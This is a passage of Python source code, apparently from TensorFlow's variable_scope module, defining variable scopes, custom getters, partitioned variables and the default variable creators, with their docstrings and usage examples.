getter that just creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True`, None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be created instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong the current variable scope.
# We build a VariableScope whose name extends the current one by the provided
# name, with inherited reuse and initializer (unless the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
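# A minimal sketch of how two custom getters compose via the wrapper above;
# `outer` and `inner` are hypothetical getters used only for illustration.
def _example_compose_custom_getters():
  def inner(getter, name, *args, **kwargs):
    return getter(name + "_inner", *args, **kwargs)
  def outer(getter, name, *args, **kwargs):
    return getter(name + "_outer", *args, **kwargs)
  composed = _maybe_wrap_custom_getter(outer, inner)
  # composed(true_getter, "v", ...) invokes `outer` first; the getter handed
  # to it is `inner` bound to `true_getter`, so the final call reaches
  # true_getter with the name "v_outer_inner".
  return composed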
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in a multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scope names are generated
only on a per-thread basis. If the same name was used within a different
thread, that does not prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For example:
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`; this name will be uniquified. If `name_or_scope` is provided,
`default_name` is not used and may be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
new variables are always created unless an EagerVariableStore or
template is currently active.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is
not inherited, and it only takes effect once, when the scope is created. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except Exception:
if self._in_graph_mode and not self._building_function:
if self._graph_context_manager is not None:
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _compute_slice_dim_and_shape(full_shape, slicing):
"""Computes which dimension is being sliced and the typical slice shape."""
slice_shape = [0] * len(full_shape)
slice_dim = None
for dim, num_slices in enumerate(slicing):
dim_size = full_shape[dim]
if num_slices <= 0 or dim_size < num_slices:
raise ValueError("Cannot create %d slices for size %d. shape: %s, "
"slicing: %s" %
(num_slices, full_shape[dim], full_shape, slicing))
if num_slices == 1:
# Not slicing in this dimension.
slice_shape[dim] = dim_size
elif slice_dim is not None:
# We only support slicing along one of the dimensions.
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, slicing: %s" % (full_shape, slicing))
else:
# Note: We will add any extras onto the last slice, later.
slice_dim = dim
slice_shape[dim] = dim_size // num_slices
# Degenerate case: If "slicing" was all ones, pretend we are slicing along
# the first dimension.
if slice_dim is None:
slice_dim = 0
return slice_dim, slice_shape
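# A worked sketch of the helper above:
#   _compute_slice_dim_and_shape([20, 10], [1, 5]) -> (1, [20, 2])
#     (dimension 1 is split into 5 slices of size 2; dimension 0 is untouched)
#   _compute_slice_dim_and_shape([20, 10], [1, 1]) -> (0, [20, 10])
#     (nothing is sliced, so the first dimension is reported by convention)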
def _get_trainable_value(synchronization, trainable):
"""Computes the trainable value based on the given arguments."""
if synchronization == VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
return trainable
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
else:
return variables.RefVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
expected_shape=expected_shape, import_scope=import_scope)
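# A minimal sketch of the dispatch above: with use_resource left as None the
# creator falls back to the scope setting and then to _DEFAULT_USE_RESOURCE,
# and eager execution always forces a ResourceVariable. The helper below is a
# hypothetical illustration for graph mode.
def _example_default_creator_dispatch():
  v_resource = default_variable_creator(
      None, initial_value=1.0, name="example_res", use_resource=True)
  v_ref = default_variable_creator(
      None, initial_value=1.0, name="example_ref", use_resource=False)
  # In graph mode v_resource is a ResourceVariable and v_ref a RefVariable;
  # under eager execution both would be ResourceVariables.
  return v_resource, v_ref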
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
validate_shape=validate_shape, caching_device=caching_device,
name=name, dtype=dtype, constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
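# A minimal sketch of why the factory above exists: a bare lambda created in a
# loop would close over the loop variables themselves and see only their final
# values, whereas _make_getter freezes the current creator/getter pair. The
# chain construction below mirrors that pattern with hypothetical names.
def _example_build_creator_chain(creators, base_getter):
  getter = base_getter
  for creator in creators:
    getter = _make_getter(creator, getter)
  # The creator wrapped last is invoked first and delegates inward until
  # `base_getter` finally runs.
  return getter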
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
A creator that wants to create a variable is supposed to eventually call
next_creator, rather than calling Variable or ResourceVariable directly.
This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
